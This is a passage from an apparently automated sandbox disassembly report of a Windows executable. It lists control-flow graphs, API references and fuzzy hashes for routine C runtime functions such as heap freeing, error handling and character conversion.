                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C060CB
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C060DD
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C060EF
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C06101
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C06113
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C06125
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C06137
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C06149
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C0615B
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C0616D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06540
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: HeapFree.KERNEL32(00000000,00000000,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?), ref: 00C0487F
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: GetLastError.KERNEL32(?,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?,?), ref: 00C04891
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06562
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06577
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06582
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C065A4
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C065B7
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C065C5
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C065D0
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06608
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0660F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0662C
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06644
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                                  • Opcode ID: 40e6aa2506e4a17ca8d3584454e534740f23193089942b1642003e80a90ac6a0
                                                                                                                                                                                                                                                  • Instruction ID: e5668d887d9f999b6849a3b93b6a533189634ff807753cc1841d1949ef1b3b9b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40e6aa2506e4a17ca8d3584454e534740f23193089942b1642003e80a90ac6a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79315EB16007049FEB64AE7AEC05B6AB3E8EF40310F148929F569D71D1DE31EEA0DB50

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 138 c04330-c04341 139 c04343-c0434c call c04869 138->139 140 c0434d-c043d8 call c04869 * 9 call c041f6 call c04246 138->140 139->140
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04344
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: HeapFree.KERNEL32(00000000,00000000,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?), ref: 00C0487F
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: GetLastError.KERNEL32(?,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?,?), ref: 00C04891
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04350
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0435B
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04366
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04371
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0437C
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04387
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04392
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0439D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C043AB
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: bdbf57e9c971849f7d58e42fb52a25d13c95fa09ca9adc4a3ab5539a6f4de325
                                                                                                                                                                                                                                                  • Instruction ID: a1af8ee6f6dea262f343cb938cd2c1d30e8b2825671a86b2b06f1febe7a9f6a7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdbf57e9c971849f7d58e42fb52a25d13c95fa09ca9adc4a3ab5539a6f4de325
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9117AF5600148EFCB45EF96D842CDA3B69EF44750F518555FA088F1E2D631DE50EB40

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 165 c07ab4-c07acd 166 c07ae3-c07ae8 165->166 167 c07acf-c07adf call c082cc 165->167 168 c07af5-c07b19 MultiByteToWideChar 166->168 169 c07aea-c07af2 166->169 167->166 174 c07ae1 167->174 171 c07cac-c07cbf call c0123a 168->171 172 c07b1f-c07b2b 168->172 169->168 175 c07b2d-c07b3e 172->175 176 c07b7f 172->176 174->166 179 c07b40-c07b4f call c0ac20 175->179 180 c07b5d-c07b63 175->180 178 c07b81-c07b83 176->178 182 c07ca1 178->182 183 c07b89-c07b9c MultiByteToWideChar 178->183 179->182 192 c07b55-c07b5b 179->192 185 c07b64 call c062ff 180->185 187 c07ca3-c07caa call c0646a 182->187 183->182 186 c07ba2-c07bbd call c05a15 183->186 189 c07b69-c07b6e 185->189 186->182 197 c07bc3-c07bca 186->197 187->171 189->182 193 c07b74 189->193 196 c07b7a-c07b7d 192->196 193->196 196->178 198 c07c04-c07c10 197->198 199 c07bcc-c07bd1 197->199 201 c07c12-c07c23 198->201 202 c07c5c 198->202 199->187 200 c07bd7-c07bd9 199->200 200->182 203 c07bdf-c07bf9 call c05a15 200->203 205 c07c25-c07c34 call c0ac20 201->205 206 c07c3e-c07c44 201->206 204 c07c5e-c07c60 202->204 203->187 220 c07bff 203->220 209 c07c62-c07c7b call c05a15 204->209 210 c07c9a-c07ca0 call c0646a 204->210 205->210 218 c07c36-c07c3c 205->218 207 c07c45 call c062ff 206->207 214 c07c4a-c07c4f 207->214 209->210 223 c07c7d-c07c84 209->223 210->182 214->210 219 c07c51 214->219 222 c07c57-c07c5a 218->222 219->222 220->182 222->204 224 c07cc0-c07cc6 223->224 225 c07c86-c07c87 223->225 226 c07c88-c07c98 WideCharToMultiByte 224->226 225->226 226->210 227 c07cc8-c07ccf call c0646a 226->227 227->187
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00C054C8,00000000,?,?,?,00C07D05,?,?,00000100), ref: 00C07B0E
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C07B46
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00C07D05,?,?,00000100,5EFC4D8B,?,?), ref: 00C07B94
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C07C2B
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C07C8E
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00C07C9B
                                                                                                                                                                                                                                                    • Part of subcall function 00C062FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00C07E5B,?,00000000,?,00C0686F,?,00000004,00000000,?,?,?,00C03BCD), ref: 00C06331
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00C07CA4
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00C07CC9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2597970681-0
                                                                                                                                                                                                                                                  • Opcode ID: 72e3a99c86847d04ae8ae553a3b7d75a5e306841eeffd4342c6526a23d3e42bc
                                                                                                                                                                                                                                                  • Instruction ID: a4b685a6cc5aab99f5e70a409e69df31cfb6c1983d73da22090f2a06ab4e73d5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72e3a99c86847d04ae8ae553a3b7d75a5e306841eeffd4342c6526a23d3e42bc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D451BE72A14216ABEF298F64CC81EAF77AAEB44754F154728FC14D61C0EB34ED50E6A0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 230 c08417-c08474 GetConsoleCP 231 c085b7-c085c9 call c0123a 230->231 232 c0847a-c08496 230->232 233 c084b1-c084c2 call c06052 232->233 234 c08498-c084af 232->234 241 c084c4-c084c7 233->241 242 c084e8-c084ea 233->242 236 c084eb-c084fa call c072b7 234->236 236->231 246 c08500-c08520 WideCharToMultiByte 236->246 244 c084cd-c084df call c072b7 241->244 245 c0858e-c085ad 241->245 242->236 244->231 253 c084e5-c084e6 244->253 245->231 246->231 248 c08526-c0853c WriteFile 246->248 250 c0853e-c0854f 248->250 251 c085af-c085b5 GetLastError 248->251 250->231 252 c08551-c08555 250->252 251->231 254 c08583-c08586 252->254 255 c08557-c08575 WriteFile 252->255 253->246 254->232 257 c0858c 254->257 255->251 256 c08577-c0857b 255->256 256->231 258 c0857d-c08580 256->258 257->231 258->254
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00C08B8C,?,00000000,?,00000000,00000000), ref: 00C08459
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00C084D4
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00C084EF
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00C08515
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,00C08B8C,00000000,?,?,?,?,?,?,?,?,?,00C08B8C,?), ref: 00C08534
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,00C08B8C,00000000,?,?,?,?,?,?,?,?,?,00C08B8C,?), ref: 00C0856D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                                  • Opcode ID: 783e70b865dd01300d7628ee52bb7e2075ff9deec7a6aef91d898bb3b937b379
                                                                                                                                                                                                                                                  • Instruction ID: 2a0b6a12e0f4f06147f74af508e9a4456c4e0b96c409a0872c1a4030f7790138
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 783e70b865dd01300d7628ee52bb7e2075ff9deec7a6aef91d898bb3b937b379
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 775172719002499FDB10CFA8DC85BEEBBF4FF59700F14811AE995E7291DB309A45CB60

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 259 c01e00-c01e51 call c0ac80 call c01dc0 call c02377 266 c01e53-c01e65 259->266 267 c01ead-c01eb0 259->267 268 c01ed0-c01ed9 266->268 270 c01e67-c01e7e 266->270 267->268 269 c01eb2-c01ebf call c02360 267->269 274 c01ec4-c01ecd call c01dc0 269->274 272 c01e80-c01e8e call c02300 270->272 273 c01e94 270->273 281 c01e90 272->281 282 c01ea4-c01eab 272->282 276 c01e97-c01e9c 273->276 274->268 276->270 279 c01e9e-c01ea0 276->279 279->268 283 c01ea2 279->283 284 c01e92 281->284 285 c01eda-c01ee3 281->285 282->274 283->274 284->276 286 c01ee5-c01eec 285->286 287 c01f1d-c01f2d call c02340 285->287 286->287 289 c01eee-c01efd call c0aac0 286->289 292 c01f41-c01f5d call c01dc0 call c02320 287->292 293 c01f2f-c01f3e call c02360 287->293 297 c01f1a 289->297 298 c01eff-c01f17 289->298 293->292 297->287 298->297
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C01E37
                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C01E3F
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C01EC8
                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00C01EF3
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C01F48
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: 7045568b2cb0f6be922843884b2ca224dbb10c4f1faef6f65be839901ea89116
                                                                                                                                                                                                                                                  • Instruction ID: da68a7240cb23787011ed0158a44f038caabf5f23105184a905621e433c44364
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7045568b2cb0f6be922843884b2ca224dbb10c4f1faef6f65be839901ea89116
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C241A034A00209ABCF10DF69C889A9EFBB5BF45364F188055EC259B3E2D735EE45CB91

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 305 c0621b-c06226 306 c062fc-c062fe 305->306 307 c0622c-c062f9 call c061df * 5 call c04869 * 3 call c061df * 5 call c04869 * 4 305->307 307->306
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00C061DF: _free.LIBCMT ref: 00C06208
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06269
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: HeapFree.KERNEL32(00000000,00000000,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?), ref: 00C0487F
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: GetLastError.KERNEL32(?,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?,?), ref: 00C04891
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06274
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0627F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C062D3
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C062DE
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C062E9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C062F4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                  • Instruction ID: 4138a69d440ee403a93fed34b7673b97d7b3d5a0dd8115f07b1b3889e1436ac7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C81151B1540B14AADD20BBB1CC07FCF779C5F40700F408D25B69BA60D3DA75BA15E650

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 342 c023d1-c023d8 343 c023da-c023dc 342->343 344 c023dd-c023f8 GetLastError call c026a4 342->344 347 c02411-c02413 344->347 348 c023fa-c023fc 344->348 349 c02457-c02462 SetLastError 347->349 348->349 350 c023fe-c0240f call c026df 348->350 350->347 353 c02415-c02425 call c03f67 350->353 356 c02427-c02437 call c026df 353->356 357 c02439-c02449 call c026df 353->357 356->357 362 c0244b-c0244d 356->362 363 c0244f-c02456 call c03ec5 357->363 362->363 363->349
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00C023C8,00C0209F,00C01AFC), ref: 00C023DF
                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C023ED
                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C02406
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00C023C8,00C0209F,00C01AFC), ref: 00C02458
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                  • Opcode ID: 377669db32eda5eab1b08e84cd4ebe5377ef7270b10f1a9b0fa09e1fcf45a1f3
                                                                                                                                                                                                                                                  • Instruction ID: 5de862ee4b6c7ae5a20207b02a897547757d6573b850f6761f28e53805b1e0b7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 377669db32eda5eab1b08e84cd4ebe5377ef7270b10f1a9b0fa09e1fcf45a1f3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA0120329083155EEB1467F57C8D76F2758EB067B47204339FA30414F5EF524D42E140

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 366 c04424-c04438 GetLastError 367 c04446-c0444b 366->367 368 c0443a-c04444 call c05904 366->368 370 c0444d call c0480c 367->370 368->367 373 c0448f-c0449a SetLastError 368->373 372 c04452-c04458 370->372 374 c04463-c04471 call c0595a 372->374 375 c0445a 372->375 381 c04473-c04474 374->381 382 c04476-c0448d call c04296 call c04869 374->382 376 c0445b-c04461 call c04869 375->376 384 c0449b-c044a7 SetLastError call c03f24 376->384 381->376 382->373 382->384
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000008,?,00C06D69,?,?,?,00C104C8,0000002C,00C03F34,00000016,00C0209F,00C01AFC), ref: 00C04428
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0445B
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04483
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00C04490
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00C0449C
                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 00C044A2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                                  • Opcode ID: 218f85b222b1d64e112a071b922c5f2aaac0d2625b5719fde8f6da8a61217463
                                                                                                                                                                                                                                                  • Instruction ID: 994500bac7ed7f016a490cb1fffece15d87f7bee1e821ad161c282ae640c3b69
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 218f85b222b1d64e112a071b922c5f2aaac0d2625b5719fde8f6da8a61217463
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4F0C8F5900680A7C61AF7B57C09B6F266EABC2771B258614FB3CD21D5EF258E02E121

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 390 c036fc-c03724 GetModuleHandleExW 391 c03726-c03739 GetProcAddress 390->391 392 c03749-c0374d 390->392 393 c03748 391->393 394 c0373b-c03746 391->394 395 c03758-c03765 call c0123a 392->395 396 c0374f-c03752 FreeLibrary 392->396 393->392 394->393 396->395
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C036AD,?,?,00C0364D,?,00C102E0,0000000C,00C037A4,?,00000002), ref: 00C0371C
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C0372F
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00C036AD,?,?,00C0364D,?,00C102E0,0000000C,00C037A4,?,00000002,00000000), ref: 00C03752
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
